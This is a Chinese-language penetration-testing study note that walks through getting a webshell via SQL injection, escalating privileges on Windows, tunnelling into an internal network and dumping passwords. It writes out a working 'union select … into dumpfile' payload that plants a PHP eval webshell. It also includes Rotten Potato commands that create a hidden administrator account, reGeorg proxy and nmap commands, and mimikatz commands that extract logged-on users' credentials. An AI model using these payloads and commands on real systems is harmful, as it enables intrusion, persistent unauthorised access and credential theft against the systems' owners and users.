通过sql注入拿到webshell
into outfile 导出文件
into dumpfile 导出文件
将查询的结果导出成文件
如何找路径?————传入错误参数,就会爆出路径
写入一句话木马,连接菜刀,去查看里面的信息
URL union select 1,"<?php eval($_REQUEST[8]) ?>" into dumpfile 'C:/phpStudy/WWW/223366.php'
注意是反斜杠,因为斜杠会被转义
然后访问URL/223366.php?8=phpinfo();
webshell管理工具:
菜刀,蚁剑(一句话木马直接连接,默认流量没有加密)
冰蝎,哥斯拉(流量加密了,一定要用专属马)
提权
当不是管理员权限的时候,需要提权:
- 利用目标主机上的服务提权(利用漏洞提权)
- 利用web服务(一台机器上可能有多个网站,多个web容器)
- 利用系统漏洞
几条常用的cmd命令:
whoami 查看当前用户权限
netstat -ano 查看本机开放的端口
tasklist 查看本机运行的程序
systeminfo 查看计算机信息
windows利用【常见手段】:查看windows打了什么补丁,然后去网上找存在哪些漏洞,对应的寻找提权工具
提权辅助页面:https://blog.neargle.com/win-powerup-exp-index/
输入补丁号,就能查询出这台机器还有哪些漏洞没有修复,找对应的exp
上传魔改后的烂土豆到目标网站,用魔改版的烂土豆:
6666.exe -p "net user cxx a1s2d3! /add"
创建账户
6666.exe -p "net localgroup administrators cxx /add"
给新建的账户添加管理员权限
远程桌面(3389)只有管理员能连接
内网穿透
很多服务器不能访问外网,想要让内网的服务器连接我们,要用到php作为中间媒介
正向连接:请求 =>php =>发送出去(无需外网)
反向连接:目标 =>连接攻击者(需要外网)
reGeorg软件——通信桥梁,将tunnel文件上传到web目录,这相当于一个通信站
网站是什么语言就传对应的上去
然后访问这个tunnel文件,页面应返回:
然后运行reGeorgSocksProxy.py
python2 reGeorgSocksProxy.py -l 127.0.0.1 -p 10086 -u http://example.com/666.php
然后去连接我们传的php文件,只要往本地开启的10086端口传参,就是在访问目标内网
开全局代理 可以用proxifier这个工具
参考资料:https://blog.csdn.net/limb0/article/details/103863534
登录了之后,先探测内网主机,再探测主机端口,用ipconfig
查看当前ip,看是什么ip段,然后上传nmap:nmap 10.0.1.1/24
,探测10.0.1.1-10.0.1.255
然后看看本机文件,针对开放的端口去测试即可。给目标主机装nmap .开始扫描(可能会比较卡)
提取本机管理员账号密码
mimikatz:https://github.com/gentilkiwi/mimikatz
进入目标服务器后,上传内网渗透神器猕猴桃mimikatz,在目标服务器上,运行指令log开启日志,运行指令privilege::debug进行提权,运行sekurlsa::logonpasswords抓取登录该主机的用户名及密码,发现管理员组用户名和密码
关于猕猴桃:https://blog.csdn.net/weixin_40412037/article/details/113348310
总结:
- SQL注入拿Webshell (into outfiel into dumpfile)
- Webshell管理工具(冰蝎,菜刀,蚁剑)
- 内网穿透(通过regeorg来设置中转站,然后用代理工具代理远程桌面 正向连接)
- 提权辅助页面,查询系统可能存在的提权漏洞
- 利用魔改版烂土豆提权
- 通过猕猴桃抓取系统存储密码